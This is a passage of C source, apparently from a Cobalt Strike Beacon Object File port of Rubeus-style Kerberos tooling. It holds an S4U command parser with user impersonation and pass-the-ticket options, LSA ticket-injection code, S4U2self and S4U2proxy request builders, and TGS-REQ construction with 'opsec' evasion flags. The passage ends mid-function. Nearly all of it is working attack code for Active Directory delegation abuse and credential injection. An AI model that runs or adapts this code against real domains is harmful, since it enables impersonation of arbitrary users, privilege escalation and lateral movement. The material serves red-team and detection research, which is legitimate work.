      char* altSname     = NULL;
      char* targetUser   = NULL;

      for (int i = 0; i < Length; i++) {
        i += GetStrParam(Buffer + i, Length - i, "/domain:", 8, &domain );
        i += GetStrParam(Buffer + i, Length - i, "/ticket:", 8, &ticket );
        i += GetStrParam(Buffer + i, Length - i, "/dc:", 4, &dc );
        i += GetStrParam(Buffer + i, Length - i, "/service:", 9, &targetSPN );
        i += GetStrParam(Buffer + i, Length - i, "/tgs:", 5, &tgs );
        i += GetStrParam(Buffer + i, Length - i, "/altservice:", 12, &altSname );
        i += GetStrParam(Buffer + i, Length - i, "/impersonateuser:", 17, &targetUser );
        i += GetStrParam(Buffer + i, Length - i, "/targetdomain:", 14, &targetDomain );
        i += GetStrParam(Buffer + i, Length - i, "/targetdc:", 10, &targetdc );
        i += IsSetParam(Buffer + i, Length - i, "/ptt", 4, &ptt );
        i += IsSetParam(Buffer + i, Length - i, "/opsec", 6, &opsec );
        i += IsSetParam(Buffer + i, Length - i, "/nopac", 6, &pac );
        i += IsSetParam(Buffer + i, Length - i, "/self", 5, &self );
      }

      pac = !pac;

      GetDomainInfo(&domain, &dc);
      if (domain == NULL || dc == NULL) {
        PRINT_OUT("[X] Could not retrieve domain information!\n\n");
        return;
      }

      if (targetUser && tgs) {
        PRINT_OUT("\n[X] You must supply either a /impersonateuser or a /tgs, but not both.\n");
        return;
      }

      KRB_CRED kirbi_tgs = { 0 };
      if (tgs) {
        int bytesTgsSize = 0;
        byte* bytesTgs = base64_decode(tgs, &bytesTgsSize);

        AsnElt   asn_KRB_CRED = { 0 };
        if (BytesToAsnDecode3(bytesTgs, bytesTgsSize, FALSE, &asn_KRB_CRED)) return;

        AsnGetKrbCred(&(asn_KRB_CRED.sub[0]), &kirbi_tgs);

        targetUser = kirbi_tgs.enc_part.ticket_info[0].pname.name_string[0];
      }
      if (!targetUser && !tgs) {
        PRINT_OUT("\n[X] You must supply a /tgs or /impersonateuser to impersonate!\n");
        return;
      }
      if (!targetSPN && tgs) {
        PRINT_OUT("\n[X] If a /tgs is supplied, you must also supply a /service !\n");
        return;
      }

      if( !targetDomain  && !tgs) {
        PRINT_OUT("\n[X] A /targetdomain or /tgs needs to be supplied for S4U across domain!\n");
        return;
      }

      if (ticket)
        S4UExecute_Ticket(ticket, targetUser, targetSPN, dc, altSname, kirbi_tgs, self, opsec, ptt, encType, targetdc, targetDomain, domain); /*impersonateDomain*/
                                                                                                                                                                                                                                                                                                  else
        PRINT_OUT("\n[X] A /ticket:X needs to be supplied for S4U!\n");
    }

    VOID go( IN PCHAR Buffer, IN ULONG Length ) {
      INIT_BOF();

      datap parser;
      BeaconDataParse(&parser, Buffer, Length);
      DWORD PARAM_SIZE = 0;
      PBYTE PARAM = BeaconDataExtract(&parser, &PARAM_SIZE);

      if( LoadFunc() )
        PRINT_OUT("%s\n", "Modules not loaded");
      else
        ASK_S4U_RUN( PARAM, PARAM_SIZE );

      FreeBank();

      END_BOF();
    }

================================================
FILE: AD-BOF/Kerbeus-BOF/s4u/s4u.c
================================================
#include "_include/asn_encode.c"
#include "_include/asn_decode.c"
#include "_include/crypt_b64.c"
#include "_include/crypt_checksum.c"
#include "_include/crypt_dec.c"
#include "_include/connection.c"

void DisplayTicket( KRB_CRED cred, int indentLevel ) {
    DateTime starttime = cred.enc_part.ticket_info[0].starttime;
    DateTime endtime = cred.enc_part.ticket_info[0].endtime;
    DateTime renew_till = cred.enc_part.ticket_info[0].renew_till;
    uint flags = cred.enc_part.ticket_info[0].flags;

    if (cred.enc_part.ticket_info[0].sname.name_count == 1)
        PRINT_OUT("  ServiceName              :  %s\n", cred.enc_part.ticket_info[0].sname.name_string[0]);
    else if (cred.enc_part.ticket_info[0].sname.name_count > 1)
        PRINT_OUT("  ServiceName              :  %s/%s\n", cred.enc_part.ticket_info[0].sname.name_string[0], cred.enc_part.ticket_info[0].sname.name_string[1]);

    PRINT_OUT("  ServiceRealm             :  %s\n", cred.enc_part.ticket_info[0].srealm);

    if (cred.enc_part.ticket_info[0].pname.name_count == 1)
        PRINT_OUT("  UserName                 :  %s\n", cred.enc_part.ticket_info[0].pname.name_string[0]);
    else if (cred.enc_part.ticket_info[0].pname.name_count > 1)
        PRINT_OUT("  UserName                 :  %s@%s\n", cred.enc_part.ticket_info[0].pname.name_string[0], cred.enc_part.ticket_info[0].pname.name_string[1]);

    PRINT_OUT("  UserRealm                :  %s\n", cred.enc_part.ticket_info[0].prealm);
    PRINT_OUT("  StartTime (UTC)          :  %02d.%02d.%04d %d:%d:%d\n", starttime.day, starttime.month, starttime.year, starttime.hour, starttime.minute, starttime.second);
    PRINT_OUT("  EndTime (UTC)            :  %02d.%02d.%04d %d:%d:%d\n", endtime.day, endtime.month, endtime.year, endtime.hour, endtime.minute, endtime.second);
    PRINT_OUT("  RenewTill (UTC)          :  %02d.%02d.%04d %d:%d:%d\n", renew_till.day, renew_till.month, renew_till.year, renew_till.hour, renew_till.minute, renew_till.second);

    PRINT_OUT("  Flags                    :  ");
    if (flags & reserved)		PRINT_OUT("reserved ");
    if (flags & forwardable)	PRINT_OUT("forwardable ");
    if (flags & forwarded)		PRINT_OUT("forwarded ");
    if (flags & proxiable)		PRINT_OUT("proxiable ");
    if (flags & proxy)			PRINT_OUT("proxy ");
    if (flags & may_postdate)	PRINT_OUT("may_postdate ");
    if (flags & postdated)		PRINT_OUT("postdated ");
    if (flags & invalid)		PRINT_OUT("invalid ");
    if (flags & renewable)		PRINT_OUT("renewable ");
    if (flags & initial)		PRINT_OUT("initial ");
    if (flags & pre_authent)	PRINT_OUT("pre_authent ");
    if (flags & hw_authent)		PRINT_OUT("hw_authent ");
    if (flags & ok_as_delegate) PRINT_OUT("ok_as_delegate ");
    if (flags & anonymous)		PRINT_OUT("anonymous ");
    if (flags & enc_pa_rep)		PRINT_OUT("enc_pa_rep ");
    if (flags & reserved1)		PRINT_OUT("reserved1 ");
    PRINT_OUT("\n");

    if (cred.enc_part.ticket_info[0].key.key_type == rc4_hmac)
        PRINT_OUT("  KeyType                  :  rc4_hmac\n");
    else if (cred.enc_part.ticket_info[0].key.key_type == aes128_cts_hmac_sha1)
        PRINT_OUT("  KeyType                  :  aes128_cts_hmac_sha1\n");
    else if (cred.enc_part.ticket_info[0].key.key_type == aes256_cts_hmac_sha1)
        PRINT_OUT("  KeyType                  :  aes256_cts_hmac_sha1\n");
}

void DescribeTicket(byte* ticket_b64) {
    int bytesSize = 0;
    byte* bytes = base64_decode(ticket_b64, &bytesSize);

    KRB_CRED kirbi = { 0 };
    AsnElt   asn_KRB_CRED = { 0 };
    if (BytesToAsnDecode3(bytes, bytesSize, false, &asn_KRB_CRED)) return;
    if (AsnGetKrbCred(&(asn_KRB_CRED.sub[0]), &kirbi)) return;
    DisplayTicket(kirbi, 2);
}


HANDLE GetCurrentToken(DWORD DesiredAccess) {
    HANDLE hCurrentToken = NULL;
    if (!ADVAPI32$OpenThreadToken(KERNEL32$GetCurrentThread(), DesiredAccess, FALSE, &hCurrentToken))
        if (hCurrentToken == NULL && KERNEL32$GetLastError() == ERROR_NO_TOKEN)
            if (!ADVAPI32$OpenProcessToken(KERNEL32$GetCurrentProcess(), DesiredAccess, &hCurrentToken))
                return NULL;
    return hCurrentToken;
}

LUID GetCurrentLUID(HANDLE TokenHandle) {
    TOKEN_STATISTICS tokenStats;
    DWORD tokenSize;
    if (!ADVAPI32$GetTokenInformation(TokenHandle, TokenStatistics, &tokenStats, sizeof(tokenStats), &tokenSize))
        return (LUID) { 0 };
    return tokenStats.AuthenticationId;
}

BOOL IsSystem(HANDLE TokenHandle) {
    UCHAR bTokenUser[sizeof(TOKEN_USER) + 8 + 4 * SID_MAX_SUB_AUTHORITIES];
    PTOKEN_USER pTokenUser = (PTOKEN_USER)bTokenUser;
    ULONG cbTokenUser;
    SID_IDENTIFIER_AUTHORITY siaNT = SECURITY_NT_AUTHORITY;
    PSID pSystemSid = NULL;
    BOOL bSystem = FALSE;

    // Try to open the token of the current thread first
    if (!ADVAPI32$OpenThreadToken(KERNEL32$GetCurrentThread(), TOKEN_QUERY, TRUE, &TokenHandle)) {
        // If there is no thread token, fall back to the process token
        if (KERNEL32$GetLastError() == ERROR_NO_TOKEN) {
            if (!ADVAPI32$OpenProcessToken(KERNEL32$GetCurrentProcess(), TOKEN_QUERY, &TokenHandle)) {
                return FALSE;
            }
        } else {
            return FALSE;
        }
    }

    if (!ADVAPI32$GetTokenInformation(TokenHandle, TokenUser, pTokenUser, sizeof(bTokenUser), &cbTokenUser)) {
        return FALSE;
    }

    if (!ADVAPI32$AllocateAndInitializeSid(&siaNT, 1, SECURITY_LOCAL_SYSTEM_RID, 0, 0, 0, 0, 0, 0, 0, &pSystemSid)) {
        return FALSE;
    }

    bSystem = ADVAPI32$EqualSid(pTokenUser->User.Sid, pSystemSid);

    ADVAPI32$FreeSid(pSystemSid);

    return bSystem;
}

BOOL GetLsaHandle(HANDLE hToken, BOOL highIntegrity, HANDLE* hLsa) {
    HANDLE hLsaLocal = NULL;
    ULONG  mode = 0;
    bool   status = TRUE;
    if (highIntegrity) {
        STRING lsaString = (STRING){ .Length = 8, .MaximumLength = 9, .Buffer = "Winlogon" };
        status = SECUR32$LsaRegisterLogonProcess(&lsaString, &hLsaLocal, &mode);
    }
    else {
        status = SECUR32$LsaConnectUntrusted(&hLsaLocal);
    }
    *hLsa = hLsaLocal;
    return status;
}

int my_isdigit(int c) {
    return (c >= '0' && c <= '9');
}

int my_islower(int c) {
    return (c >= 'a' && c <= 'z');
}

long int my_strtol(const char* str, char** endptr, int base) {
    long int result = 0;
    int sign = 1;

    if (*str == '-' || *str == '+') {
        sign = (*str == '-') ? -1 : 1;
        str++;
    }

    while (my_isdigit(*str) ||
           (base == 16 && (*str >= 'a' && *str <= 'f')) ||
           (base == 16 && (*str >= 'A' && *str <= 'F'))) {
        int digit = 0;
        if (my_isdigit(*str)) {
            digit = *str - '0';
        }
        else if (base == 16) {
            digit = (my_islower(*str) ? (*str - 'a' + 10) : (*str - 'A' + 10));
        }

        if (digit >= base)
            break;

        if (result > (LONG_MAX - digit) / base) {
            if (sign == 1)
                return LONG_MAX;
            else
                return LONG_MIN;
        }

        result = result * base + digit;
        str++;
    }

    if (endptr != NULL)
        *endptr = (char*)str;

    return result * sign;
}

void PTT(char* luid, byte* ticket) {
    HANDLE hToken = GetCurrentToken(TOKEN_QUERY);
    LUID   currentLuid = GetCurrentLUID(hToken);
    LUID   targetLuid = { 0 };
    bool   IsHighIntegrity = IsSystem(hToken);

    if (luid) {
        targetLuid.LowPart = my_strtol(luid, NULL, 16);
        if (targetLuid.LowPart == 0 || targetLuid.LowPart == LONG_MAX || targetLuid.LowPart == LONG_MIN) {
            PRINT_OUT("[x] Invalid luid\n");
            return;
        }
    }
    else {
        targetLuid = currentLuid;
    }

    if (!IsHighIntegrity && currentLuid.LowPart != targetLuid.LowPart) {
        PRINT_OUT("[X] You need to be in SYSTEM integrity.\n");
        return;
    }

    if (currentLuid.LowPart != targetLuid.LowPart)
        IsHighIntegrity = FALSE;

    HANDLE hLsa;
    if (GetLsaHandle(hToken, IsHighIntegrity, &hLsa)) return;

    ULONG authPackage;
    LSA_STRING krbAuth = { .Buffer = "kerberos",.Length = 8,.MaximumLength = 9 };
    if (SECUR32$LsaLookupAuthenticationPackage(hLsa, &krbAuth, &authPackage) == 0) {

        int decode_ticket_size = 0;
        byte* decode_ticket = base64_decode(ticket, &decode_ticket_size);

        int submitSize = sizeof(KERB_SUBMIT_TKT_REQUEST) + decode_ticket_size;
        KERB_SUBMIT_TKT_REQUEST* submitRequest = MemAlloc(submitSize);

        submitRequest->MessageType = KerbSubmitTicketMessage;
        submitRequest->KerbCredSize = decode_ticket_size;
        submitRequest->KerbCredOffset = sizeof(KERB_SUBMIT_TKT_REQUEST);
        if (IsHighIntegrity)
            submitRequest->LogonId = targetLuid;
        else
            submitRequest->LogonId = (LUID){ 0 };

        MemCpy((PBYTE)submitRequest + submitRequest->KerbCredOffset, decode_ticket, decode_ticket_size);

        NTSTATUS protocolStatus = 0;
        ULONG    responseSize = 0;
        void* response = 0;
        if (SECUR32$LsaCallAuthenticationPackage(hLsa, authPackage, submitRequest, submitSize, &response, &responseSize, &protocolStatus) || protocolStatus)
            PRINT_OUT("\n[X] Ticket not imported.\n");
        else
        PRINT_OUT("\n[+] Ticket successfully imported.\n");
    }
    SECUR32$LsaDeregisterLogonProcess(hLsa);
}




byte* ADRestrictionEntry_buildTokenStruct(uint flags, uint tokenIL) {
    byte* data = MemAlloc(40);

    data[0] = (byte)(flags >> 24);
    data[1] = (byte)(flags >> 16);
    data[2] = (byte)(flags >> 8);
    data[3] = (byte)(flags);
    data[4] = (byte)(tokenIL >> 24);
    data[5] = (byte)(tokenIL >> 16);
    data[6] = (byte)(tokenIL >> 8);
    data[7] = (byte)(tokenIL);
    ADVAPI32$SystemFunction036(data + 8, 32);
    return data;
}



BOOL New_PA_DATA_s4uX509user(EncryptionKey key, char* name, char* realm, uint nonce, int eType, PA_DATA* pa_data) {

    PA_S4U_X509_USER* pa = MemAlloc(sizeof(PA_S4U_X509_USER));
    pa->user_id.nonce = nonce;
    pa->user_id.options = 0x20000000;
    if (my_copybuf(&(pa->user_id.crealm), realm, my_strlen(realm) + 1)) return TRUE;
    pa->user_id.cname.name_type = PRINCIPAL_NT_ENTERPRISE;
    pa->user_id.cname.name_count = 1;
    pa->user_id.cname.name_string = MemAlloc(sizeof(void*) * pa->user_id.cname.name_count);
    if (my_copybuf(&(pa->user_id.cname.name_string[0]), name, my_strlen(name) + 1)) return TRUE;

    AsnElt userIDAsn = { 0 }, userIDSeq = { 0 };
    if (AsnS4UUserIDEncode(&(pa->user_id), &userIDAsn)) return TRUE;
    if (Make3(ASN_SEQUENCE, &userIDAsn, 1, &userIDSeq)) return TRUE;

    int userIDBytes_length = ValueLength(&userIDSeq);
    byte* userIDBytes = MemAlloc(userIDBytes_length);
    userIDBytes_length = EncodeValue(&userIDSeq, 0, userIDBytes_length, userIDBytes, 0);

    byte* cksumBytes = NULL;
    int cksumBytesLength = 0;

    if (eType == aes256_cts_hmac_sha1)
        if (checksum(key.key_value, key.key_size, userIDBytes, userIDBytes_length, KERB_CHECKSUM_HMAC_SHA1_96_AES256, KRB_KEY_USAGE_PA_S4U_X509_USER, &cksumBytes, &cksumBytesLength)) return TRUE;
    if (eType == aes128_cts_hmac_sha1)
        if (checksum(key.key_value, key.key_size, userIDBytes, userIDBytes_length, KERB_CHECKSUM_HMAC_SHA1_96_AES128, KRB_KEY_USAGE_PA_S4U_X509_USER, &cksumBytes, &cksumBytesLength)) return TRUE;
    if (eType == rc4_hmac)
        if (checksum(key.key_value, key.key_size, userIDBytes, userIDBytes_length, KERB_CHECKSUM_RSA_MD4, KRB_KEY_USAGE_PA_S4U_X509_USER, &cksumBytes, &cksumBytesLength)) return TRUE;

    pa->cksum.cksumtype = KERB_CHECKSUM_HMAC_SHA1_96_AES256;
    pa->cksum.checksum_length = cksumBytesLength;
    pa->cksum.checksum = cksumBytes;

    pa_data->type = PADATA_PA_S4U_X509_USER;
    pa_data->value = pa;
    return FALSE;
}

BOOL New_PA_DATA_s4u2self(EncryptionKey key, char* name, char* realm, PA_DATA* pa_data) {
    int realm_length = my_strlen(realm);
    int name_length = my_strlen(name);

    PA_FOR_USER* pa = MemAlloc(sizeof(PA_FOR_USER));

    pa->userName.name_count = 1;
    pa->userName.name_type = PRINCIPAL_NT_ENTERPRISE;
    pa->userName.name_string = MemAlloc(sizeof(void*) * pa->userName.name_count);
    if (!pa->userName.name_string) {
        PRINT_OUT("[x] Failed alloc memory");
        return TRUE;
    }

    if (my_copybuf(&(pa->userName.name_string[0]), name, name_length + 1)) return TRUE;
    if (my_copybuf(&(pa->userRealm), realm, realm_length + 1)) return TRUE;
    if (my_copybuf(&(pa->auth_package), "Kerberos", 9)) return TRUE;

    byte nameTypeBytes[] = { 0,0,0,0 };
    nameTypeBytes[0] = 0xa;
    byte* finalBytes = MemAlloc(4 + name_length + realm_length + 8);
    MemCpy(finalBytes, nameTypeBytes, 4);
    MemCpy(finalBytes + 4, name, name_length);
    MemCpy(finalBytes + 4 + name_length, realm, realm_length);
    MemCpy(finalBytes + 4 + name_length + realm_length, pa->auth_package, 8);

    byte* outBytes = NULL;
    int outBytesLength = 0;
    if (checksum(key.key_value, key.key_size, finalBytes, 4 + name_length + realm_length + 8, KERB_CHECKSUM_HMAC_MD5, KRB_KEY_USAGE_KRB_NON_KERB_CKSUM_SALT, &outBytes, &outBytesLength)) return TRUE;

    pa->cksum.cksumtype = KERB_CHECKSUM_HMAC_MD5;
    pa->cksum.checksum_length = outBytesLength;
    pa->cksum.checksum = outBytes;

    pa_data->type = PADATA_S4U2SELF;
    pa_data->value = pa;
    return FALSE;
}

BOOL New_PA_DATA_KeyListReq(int eType, PA_DATA* pa_data) {
    PA_KEY_LIST_REQ* pa = MemAlloc(sizeof(PA_KEY_LIST_REQ));
    pa->Enctype = eType;

    pa_data->type = PADATA_KEY_LIST_REQ;
    pa_data->value = pa;
    return FALSE;
}

BOOL New_PA_DATA_options(BOOL claims, BOOL branch, BOOL fullDC, BOOL rbcd, PA_DATA* pa_data) {
    PA_PAC_OPTIONS* pac = MemAlloc(sizeof(PA_PAC_OPTIONS));
    if (claims) pac->kerberosFlags[0] = (byte)(pac->kerberosFlags[0] | 8);
    if (branch) pac->kerberosFlags[0] = (byte)(pac->kerberosFlags[0] | 4);
    if (fullDC) pac->kerberosFlags[0] = (byte)(pac->kerberosFlags[0] | 2);
    if (rbcd) pac->kerberosFlags[0] = (byte)(pac->kerberosFlags[0] | 1);
    pac->kerberosFlags[0] = (byte)(pac->kerberosFlags[0] * 0x10);

    pa_data->type = PADATA_PA_PAC_OPTIONS;
    pa_data->value = pac;
    return FALSE;
}

BOOL New_PA_DATA(char* crealm, char* cname, Ticket providedTicket, EncryptionKey clientKey, BOOL opsec, byte* req_body, int req_body_length, PA_DATA* pa_data) {

    AP_REQ* ap_req = MemAlloc(sizeof(AP_REQ));
    if (!ap_req) {
        PRINT_OUT("[x] Failed alloc memory");
        return TRUE;
    }
    ap_req->pvno = 5;
    ap_req->msg_type = KERB_AP_REQ;
    ap_req->ap_options = 0;
    ap_req->ticket = providedTicket;
    ap_req->keyUsage = KRB_KEY_USAGE_TGS_REQ_PA_AUTHENTICATOR;
    ap_req->key = clientKey;

    DateTime dt = GetGmTimeAdd(0);

    if (my_copybuf(&(ap_req->authenticator.crealm), crealm, my_strlen(crealm) + 1)) return TRUE;

    ap_req->authenticator.authenticator_vno = 5;
    ap_req->authenticator.ctime = dt;
    ap_req->authenticator.cname.name_count = 1;
    ap_req->authenticator.cname.name_type = PRINCIPAL_NT_PRINCIPAL;
    ap_req->authenticator.cname.name_string = MemAlloc(sizeof(void*) * ap_req->authenticator.cname.name_count);
    if (!ap_req->authenticator.cname.name_string) {
        PRINT_OUT("[x] Failed alloc memory");
        return TRUE;
    }
    if (my_copybuf(&(ap_req->authenticator.cname.name_string[0]), cname, my_strlen(cname) + 1)) return TRUE;

    if (opsec) {
        ADVAPI32$SystemFunction036(&(ap_req->authenticator.seq_number), 4);
        PRINT_OUT("[+] Sequence number is: %u\n", ap_req->authenticator.seq_number);
        ADVAPI32$SystemFunction036(&(ap_req->authenticator.cusec), 4);
        ap_req->authenticator.cusec = ap_req->authenticator.cusec % 1000000;

        if (req_body) {
            ap_req->authenticator.cksum.cksumtype = KERB_CHECKSUM_RSA_MD5;
            ap_req->authenticator.cksum.checksum_length = req_body_length;
            ap_req->authenticator.cksum.checksum = req_body;
        }
    }

    pa_data->type = PADATA_AP_REQ;
    pa_data->value = ap_req;
    return FALSE;
}

BOOL NewTGS_REP(AsnElt asn_TGS_REP, TGS_REP* tgs_rep) {
    if (asn_TGS_REP.tagValue != KERB_TGS_REP) {
        PRINT_OUT("TGS-REP tag value should be 13");
        return TRUE;
    }
    if ((asn_TGS_REP.subCount != 1) || (asn_TGS_REP.sub[0].tagValue != 16)) {
        PRINT_OUT("First TGS-REP sub should be a sequence");
        return TRUE;
    }

    // extract the KDC-REP out
    AsnElt* kdc_rep = asn_TGS_REP.sub[0].sub;
    for (int i = 0; i < asn_TGS_REP.sub[0].subCount; i++) {
        int tagValue = kdc_rep[i].tagValue;
        if ( tagValue == 0 ) {
            if (AsnGetInteger(&(kdc_rep[i].sub[0]), &(tgs_rep->pvno))) return TRUE;
        }
        if ( tagValue == 1 ) {
            if (AsnGetInteger(&(kdc_rep[i].sub[0]), &(tgs_rep->msg_type))) return TRUE;
        }
        if ( tagValue == 2 ) {
            if (AsnGetPaData(&(kdc_rep[i].sub[0]), &(tgs_rep->padata))) return TRUE;
        }
        if ( tagValue == 3 ) {
            if (AsnGetString(&(kdc_rep[i].sub[0]), &(tgs_rep->crealm))) return TRUE;
        }
        if ( tagValue == 4 ) {
            if (AsnGetPrincipalName(&(kdc_rep[i].sub[0]), &(tgs_rep->cname))) return TRUE;
        }
        if ( tagValue == 5 ) {
            if (AsnGetTicket(&(kdc_rep[i].sub[0].sub[0]), &(tgs_rep->ticket))) return TRUE;
        }
        if ( tagValue == 6 ) {
            if (AsnGetEncryptedData(&(kdc_rep[i].sub[0]), &(tgs_rep->enc_part))) return TRUE;
        }
    }
    return FALSE;
}

BOOL NewTGS_REQ(char* userName, char* domain, char* sname, Ticket providedTicket, EncryptionKey clientKey, int requestEType, byte* tgs, BOOL opsec, BOOL u2u, BOOL unconstrained, char* targetDomain, char* s4uUser, BOOL keyList, BOOL renew, byte** reqBytes, int* reqBytesSize) {
    AS_REQ req = { 0 };

    req.pvno = 5;
    req.msg_type = 12;

    req.req_body.kdc_options = FORWARDABLE | RENEWABLE | RENEWABLEOK;
    req.req_body.till = 24 * 3600;		 // valid for 1h
    ADVAPI32$SystemFunction036(&(req.req_body.nonce), 4);

    if (!opsec && !u2u) {
        req.req_body.cname.name_type = PRINCIPAL_NT_PRINCIPAL;
        req.req_body.cname.name_count = 1;
        req.req_body.cname.name_string = MemAlloc(sizeof(void*) * req.req_body.cname.name_count);
        if (!req.req_body.cname.name_string) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        if (my_copybuf(&(req.req_body.cname.name_string[0]), userName, my_strlen(userName) + 1)) return TRUE;
    }

    if (targetDomain == NULL)
        if (my_copybuf(&targetDomain, domain, my_strlen(domain) + 1)) return TRUE;

    int partsCount = 0;
    char** parts = my_strsplit( sname, '/', &partsCount );

    if (my_copybuf(&req.req_body.realm, targetDomain, my_strlen(targetDomain) + 1)) return TRUE;
    StrToUpper(req.req_body.realm);

    req.req_body.etypes_count = 0;
    int etypeIndex = 0;
    if (s4uUser && opsec)
        req.req_body.etypes_count += 1;

    if (requestEType == subkey_keymaterial) {
        req.req_body.etypes_count += 4;
        req.req_body.etypes = MemAlloc(sizeof(int) * req.req_body.etypes_count);
        if (!req.req_body.etypes) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        req.req_body.etypes[etypeIndex++] = aes256_cts_hmac_sha1;
        req.req_body.etypes[etypeIndex++] = aes128_cts_hmac_sha1;
        req.req_body.etypes[etypeIndex++] = rc4_hmac;
        req.req_body.etypes[etypeIndex++] = rc4_hmac_exp;
    }
    else if (opsec && (partsCount > 1) && my_strcmp(parts[0], "krbtgt")) {
        req.req_body.etypes_count += 5;
        req.req_body.etypes = MemAlloc(sizeof(int) * req.req_body.etypes_count);
        if (!req.req_body.etypes) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        req.req_body.etypes[etypeIndex++] = aes256_cts_hmac_sha1;
        req.req_body.etypes[etypeIndex++] = aes128_cts_hmac_sha1;
        req.req_body.etypes[etypeIndex++] = rc4_hmac;
        req.req_body.etypes[etypeIndex++] = rc4_hmac_exp;
        req.req_body.etypes[etypeIndex++] = old_exp;
    }
    else {
        req.req_body.etypes_count += 1;
        req.req_body.etypes = MemAlloc(sizeof(int) * req.req_body.etypes_count);
        if (!req.req_body.etypes) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        req.req_body.etypes[etypeIndex++] = requestEType;
    }

    if (s4uUser) {
        if (u2u) {
            req.req_body.kdc_options = req.req_body.kdc_options | CANONICALIZE | ENCTKTINSKEY | FORWARDABLE | RENEWABLE | RENEWABLEOK;
            req.req_body.sname.name_type = PRINCIPAL_NT_UNKNOWN;
            req.req_body.sname.name_count = 1;
            req.req_body.sname.name_string = MemAlloc(req.req_body.sname.name_count * sizeof(void*));
            my_copybuf(&(req.req_body.sname.name_string[0]), sname, my_strlen(sname) + 1);
        }
        else {
            req.req_body.sname.name_type = PRINCIPAL_NT_PRINCIPAL;
            req.req_body.sname.name_count = 1;
            req.req_body.sname.name_string = MemAlloc(req.req_body.sname.name_count * sizeof(void*));
            my_copybuf(&(req.req_body.sname.name_string[0]), userName, my_strlen(userName) + 1);
        }

        if (opsec)
            req.req_body.etypes[etypeIndex++] = old_exp;
        else
            req.req_body.kdc_options = req.req_body.kdc_options | ENCTKTINSKEY;
    }
    else if (u2u) {
        req.req_body.kdc_options = req.req_body.kdc_options | CANONICALIZE | ENCTKTINSKEY | FORWARDABLE | RENEWABLE | RENEWABLEOK;
        req.req_body.sname.name_type = PRINCIPAL_NT_PRINCIPAL;
        req.req_body.sname.name_count = 1;
        req.req_body.sname.name_string = MemAlloc(req.req_body.sname.name_count * sizeof(void*));
        my_copybuf(&(req.req_body.sname.name_string[0]), sname, my_strlen(sname) + 1);
    }
    else {
        if (partsCount == 1) {
            // service and other unique instance (e.g. krbtgt)
            req.req_body.sname.name_type = PRINCIPAL_NT_SRV_INST;
            req.req_body.sname.name_count = 2;
            req.req_body.sname.name_string = MemAlloc(req.req_body.sname.name_count * sizeof(void*));
            my_copybuf(&(req.req_body.sname.name_string[0]), parts[0], my_strlen(parts[0]) + 1);
            my_copybuf(&(req.req_body.sname.name_string[1]), domain, my_strlen(domain) + 1);
        }
        else if (partsCount == 2) {
            //      SPN (sname/server.domain.com)
            req.req_body.sname.name_type = PRINCIPAL_NT_SRV_INST;
            req.req_body.sname.name_count = 2;
            req.req_body.sname.name_string = MemAlloc(req.req_body.sname.name_count * sizeof(void*));
            my_copybuf(&(req.req_body.sname.name_string[0]), parts[0], my_strlen(parts[0]) + 1);
            my_copybuf(&(req.req_body.sname.name_string[1]), parts[1], my_strlen(parts[1]) + 1);
        }
        else if (partsCount == 3) {
            //      SPN (sname/server.domain.com/blah)
            req.req_body.sname.name_type = PRINCIPAL_NT_SRV_HST;
            req.req_body.sname.name_count = 3;
            req.req_body.sname.name_string = MemAlloc(req.req_body.sname.name_count * sizeof(void*));
            my_copybuf(&(req.req_body.sname.name_string[0]), parts[0], my_strlen(parts[0]) + 1);
            my_copybuf(&(req.req_body.sname.name_string[1]), parts[1], my_strlen(parts[1]) + 1);
            my_copybuf(&(req.req_body.sname.name_string[2]), parts[2], my_strlen(parts[2]) + 1);
        }
        else {
            PRINT_OUT("[X] Error: invalid TGS_REQ sname '%s'\n", sname);
        }
    }

    if (renew)
        req.req_body.kdc_options = req.req_body.kdc_options | RENEW;

    KRB_CRED kirbi_tgs = { 0 };
    if (tgs) {
        int bytesTgsSize = 0;
        byte* bytesTgs = base64_decode(tgs, &bytesTgsSize);

        AsnElt   asn_KRB_CRED = { 0 };
        if (BytesToAsnDecode3(bytesTgs, bytesTgsSize, FALSE, &asn_KRB_CRED)) return TRUE;

        if (AsnGetKrbCred(&(asn_KRB_CRED.sub[0]), &kirbi_tgs)) return TRUE;

        req.req_body.additional_tickets_count = 1;
        req.req_body.additional_tickets = MemAlloc(sizeof(Ticket) * req.req_body.additional_tickets_count);
        req.req_body.additional_tickets[0] = kirbi_tgs.tickets[0];
        if (!u2u) {
            req.req_body.kdc_options = req.req_body.kdc_options | CONSTRAINED_DELEGATION | CANONICALIZE;
            req.req_body.kdc_options = req.req_body.kdc_options ^ (req.req_body.kdc_options & RENEWABLEOK);
        }
    }
    if (keyList)
        req.req_body.kdc_options = CANONICALIZE;

    byte* cksum_Bytes = NULL;
    int cksum_Bytes_length = 0;

    if (opsec) {
        req.req_body.kdc_options = req.req_body.kdc_options | CANONICALIZE;
        if (unconstrained)
            req.req_body.kdc_options = req.req_body.kdc_options | FORWARDED;
        else
            req.req_body.kdc_options = req.req_body.kdc_options ^ (req.req_body.kdc_options & RENEWABLEOK);

        // get hostname and hostname of SPN
        int size = MAX_COMPUTERNAME_LENGTH + 2;
        char* hostname = MemAlloc(size);
        if (!hostname) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        KERNEL32$GetComputerNameA(hostname, &size);
        int netbiosSize = 16;
        int numSpaces = (size < netbiosSize) ? (netbiosSize - size) : 0;
        int i = 0;
        for (; i < numSpaces; i++)
            hostname[size + i] = ' ';
        hostname[size + numSpaces] = 0;

        char* targetHostName;
        if (partsCount > 1) {
            int substrIndex = my_strfind(parts[1], '.');
            if (substrIndex < 0)
                substrIndex = my_strlen(parts[1]) + 1;

            my_copybuf(&(targetHostName), parts[1], substrIndex);
            targetHostName[substrIndex] = 0;
            StrToUpper(targetHostName);
        }
        else {
            my_copybuf(&(targetHostName), hostname, my_strlen(hostname) + 1);
        }

        // create enc-authorization-data if target host is not the local machine
        if (my_strcmp(hostname, targetHostName) && (s4uUser == NULL) && !unconstrained) {
            ADIfRelevant ifrelevant = { 0 };
            ifrelevant.ad_type = 1;
            ifrelevant.ADData_count = 2;
            ifrelevant.ADData = MemAlloc(2 * sizeof(void*));

            ADRestrictionEntry restrictions = { 0 };
            restrictions.ad_type = 141; // KERB_AUTH_DATA_TOKEN_RESTRICTIONS;
            restrictions.restriction_type = 0;
            restrictions.restriction_length = 40;
